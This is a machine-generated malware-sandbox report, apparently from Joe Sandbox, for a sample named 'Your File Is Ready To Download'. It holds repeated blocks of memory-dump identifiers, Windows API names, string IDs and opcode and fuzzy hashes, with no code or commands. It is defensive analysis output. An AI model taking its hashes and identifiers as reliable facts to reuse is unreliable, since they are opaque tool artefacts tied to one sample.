                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcsncpy$DiskFreeLabelSpaceVolume
                                                                                                                                                                                                                          • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 1259151110-457448710
                                                                                                                                                                                                                          • Opcode ID: c8240890632d4640e21d9544eb1d4cfc45cf5f7cd1f2786e236af0401669bbda
                                                                                                                                                                                                                          • Instruction ID: 65954922904b7675b33169d31ade53baa2856b151111e240089bb3e8fcc5fcc8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8240890632d4640e21d9544eb1d4cfc45cf5f7cd1f2786e236af0401669bbda
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37C1DD72604A4085FB22DB26D4003FA6362F74DBE8F544212EB6E577E9DA7EC985E340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ForegroundLongVisiblemalloc
                                                                                                                                                                                                                          • String ID: 0x%08X$Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 3124468314-2084117749
                                                                                                                                                                                                                          • Opcode ID: 0104b18eeb464d3f132f21a786c85cc0616c5f53f72c3cf15b62a0491825cdc1
                                                                                                                                                                                                                          • Instruction ID: 8674c50f6ee5735242b3a5119cb04b93a2874a0cf7386be8362db15dcc10f3c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0104b18eeb464d3f132f21a786c85cc0616c5f53f72c3cf15b62a0491825cdc1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5891E332A08A4482EB27DF26D0043ED63A2A74CBD8F544612FB5E177F9DB79C942D344
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSendTimeout
                                                                                                                                                                                                                          • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 1599653421-457448710
                                                                                                                                                                                                                          • Opcode ID: 9d8b547c95bdde4c25c4efb147c8e06d290d7d48f6f9f752d6d528f40707f4e3
                                                                                                                                                                                                                          • Instruction ID: 5c4f0a8397971feea1a408e8c131fd75622cb045fc0b10784931d4204c731187
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d8b547c95bdde4c25c4efb147c8e06d290d7d48f6f9f752d6d528f40707f4e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFA10332210B8081FB639B26D404BEA6361F75DBE8F544216EF5A17BEACB3CC446D340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Button%s
                                                                                                                                                                                                                          • API String ID: 0-752360883
                                                                                                                                                                                                                          • Opcode ID: a390547361d97f42dd62dc3e5404cc432f3537a714abf9079b9ce90132f9ae46
                                                                                                                                                                                                                          • Instruction ID: bf8c648d8d43d0f56908223e8cf259bd8188cb9a65312f9997871af1ccff45d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a390547361d97f42dd62dc3e5404cc432f3537a714abf9079b9ce90132f9ae46
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7252BC33301B8486EB26CA3695443FA67A1F748BE4F944315EF6947BE9EB78C641D340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Button%s
                                                                                                                                                                                                                          • API String ID: 0-752360883
                                                                                                                                                                                                                          • Opcode ID: 13bb319c07fe60c680617079371a11e911f338606c7e4116d9400195ae6ce679
                                                                                                                                                                                                                          • Instruction ID: 58ebd7b5569ae0fa898e350418e2491ccf96151b302b515c3397dfb32da76a9c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13bb319c07fe60c680617079371a11e911f338606c7e4116d9400195ae6ce679
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B62BD33300B8486EB26CA3695483FA67A1F7487E4F944315EF6947BE9EB78C640D740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Button%s
                                                                                                                                                                                                                          • API String ID: 0-752360883
                                                                                                                                                                                                                          • Opcode ID: b933b6509b4f0dfba5355d6a6fb93c2e579a846ca2f49161f436f1f0c8921317
                                                                                                                                                                                                                          • Instruction ID: 90ab8ab9cebaa2a7ca95c3e20255f2db65f68c13f1189f25bc4b80ba08595454
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b933b6509b4f0dfba5355d6a6fb93c2e579a846ca2f49161f436f1f0c8921317
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A852AB33301B8486EB268A3695443FA67A1F748BE4FA40315EF6947BE9EB78C640D740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Button%s
                                                                                                                                                                                                                          • API String ID: 0-752360883
                                                                                                                                                                                                                          • Opcode ID: 0c3cb58ee1ec77ad07fd51da2c185be298b2e0feb5456eebfe4966cfc4fd176d
                                                                                                                                                                                                                          • Instruction ID: 38dd844d79ec5db08fdae1e13e6426a0dd20f18caa47a6cd8c4dfe0405aa6976
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c3cb58ee1ec77ad07fd51da2c185be298b2e0feb5456eebfe4966cfc4fd176d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB52AC32300B8496EB26CB3695443FA67A1F748BE4FA40315EF6947BE9EB78C641D740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                          • API String ID: 0-2761157908
                                                                                                                                                                                                                          • Opcode ID: e53e507b9e4632d28240df657cb3975822b76def0f2b1a9e78472029ff44d66a
                                                                                                                                                                                                                          • Instruction ID: f722a68e346a0a00167013cbe5131c505941543e934024ae535bce9b286aee10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e53e507b9e4632d28240df657cb3975822b76def0f2b1a9e78472029ff44d66a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F062D277B246518BF736CF76C000BED37B2BB58788F849019EF0567A98EA348916C764
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 0-457448710
                                                                                                                                                                                                                          • Opcode ID: e86c449c25c962ef3092796b55c7613746b844d1373ac1738abe51217b179473
                                                                                                                                                                                                                          • Instruction ID: 149ee7bbda4bfc384a120be5e5a92ad48e1d8d73a32f8cf3b6fc17d9072b26b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e86c449c25c962ef3092796b55c7613746b844d1373ac1738abe51217b179473
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE91C172604B5081EB639B23D4043FAA3A2A75CBD4F548612FB5E177E9DB78C986E340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 48322524-0
                                                                                                                                                                                                                          • Opcode ID: dde0e23184eb4b85c4be0181b70095edbfd68f0bf2424e3006dabb8d17953312
                                                                                                                                                                                                                          • Instruction ID: e08a98fb4ad7be18a68edb38f80a90e589970f7bfcef9dd52f8e55afdeb460c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dde0e23184eb4b85c4be0181b70095edbfd68f0bf2424e3006dabb8d17953312
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF0547260534082FE665722B8493E813556F9A7B0F485734AA3D0B3F2EA7C85DA8910
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                          • String ID: Out of memory.
                                                                                                                                                                                                                          • API String ID: 2803490479-4087320997
                                                                                                                                                                                                                          • Opcode ID: 5e6afb7feea786a948b09a91cbeac3c10310c863ef857a52c4694ffbac665a42
                                                                                                                                                                                                                          • Instruction ID: 4ab0eb29b4b799dac9d2a91a93844e5d5b2b3669cfd1aa6033798cdf9e6b48a8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e6afb7feea786a948b09a91cbeac3c10310c863ef857a52c4694ffbac665a42
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14F19A33200A8486EB66DF2BC554BE937A2F748BD8F455225EB1D17BE9DB34CA85C340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 91392591191e8db755cead2135f79257377545bccbd1ac7aaf119afed8fe4863
                                                                                                                                                                                                                          • Instruction ID: 6a7815e002ad95f1f8fef32278e0b9c999a7f63437a6ba05c8b9b827fb4183e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91392591191e8db755cead2135f79257377545bccbd1ac7aaf119afed8fe4863
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B126A32B00B908AE765CFAAD441BED37B5F718798F25412AEF4857BA8DB74C941CB40
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 85789c11792fc48d90b6161d011240e4be3dc5371aebc8dd8522116747c55a3f
                                                                                                                                                                                                                          • Instruction ID: 0babe6e92625587c5192057caf85738a4f3410fa05e20bfbe56e9baf939b5391
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85789c11792fc48d90b6161d011240e4be3dc5371aebc8dd8522116747c55a3f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C14104A79149A04BFB068623A4E23F577E1D365BA3F894412B7C4436C6D12DC68FEB20
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$SelectText$CapsDeviceFaceMetricsReleaseStockwcsncpy
                                                                                                                                                                                                                          • String ID: Can't create font.$Too many fonts.
                                                                                                                                                                                                                          • API String ID: 113413196-123602064
                                                                                                                                                                                                                          • Opcode ID: eaa87ff1d84e881ab6b6e1637c96aa2fdf24c204536da0ca5328fe421d0de6c5
                                                                                                                                                                                                                          • Instruction ID: edb802fea85ac3b9ef79c25bebb9df598249f1c3e9a66c48a413bfad6f998ec7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eaa87ff1d84e881ab6b6e1637c96aa2fdf24c204536da0ca5328fe421d0de6c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06B1BC727006818AEB2A9F36E8507E977A1F789B98F008116EF5A076F9DB3CC546C740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateIconObject$BitsCompatibleDrawFlushInfoSectionSelect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1804173336-0
                                                                                                                                                                                                                          • Opcode ID: 7aee31ec92bde63d3ea82f51c7486baecdb1a0c94470f2e2e00459c2e0d10d33
                                                                                                                                                                                                                          • Instruction ID: 7a6eaf64d1ea9cfd6b4c9b2e1a319b44077451b2f87e9aba24267bb56aafb39b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aee31ec92bde63d3ea82f51c7486baecdb1a0c94470f2e2e00459c2e0d10d33
